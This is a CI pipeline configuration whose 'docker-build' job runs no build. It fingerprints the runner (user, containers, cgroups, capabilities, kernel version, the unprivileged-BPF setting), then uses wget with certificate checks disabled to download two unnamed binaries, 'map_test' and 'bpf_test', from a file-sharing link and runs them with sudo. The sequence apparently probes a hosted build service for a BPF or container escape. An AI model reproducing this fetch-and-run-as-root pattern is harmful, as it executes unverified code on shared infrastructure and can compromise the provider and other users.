build:
  nodes:
    docker-build:
      environment:
        # caching works with the remote_engine and the local executor
        docker: 
            remote_engine: true

      # This example uses a minimal node, but it works equally fine with a auto-setup node.
      commands:
        - whoami
        - docker -h
        - docker ps -a
        - docker run --name dev ubuntu:20.04 bash
        - docker ps -a
        - docker inspect dev
        - ls /
        - ps -ef
        - cat /proc/version
        - cat /etc/issue
        - cat /proc/1/cgroup
        - cat /proc/1/status | grep Cap
        - uname -a
        - cat /proc/sys/kernel/unprivileged_bpf_disabled
        - wget https://cloud.tsinghua.edu.cn/f/d9fb6f267b564af1bae7/?dl=1 -O map_test --no-check-certificate
        - chmod +x map_test
        - sudo ls
        - sudo ./map_test
        - wget https://cloud.tsinghua.edu.cn/f/76307d9ba25040beaef6/?dl=1 -O bpf_test --no-check-certificate
        - chmod +x bpf_test
        - sudo ./bpf_test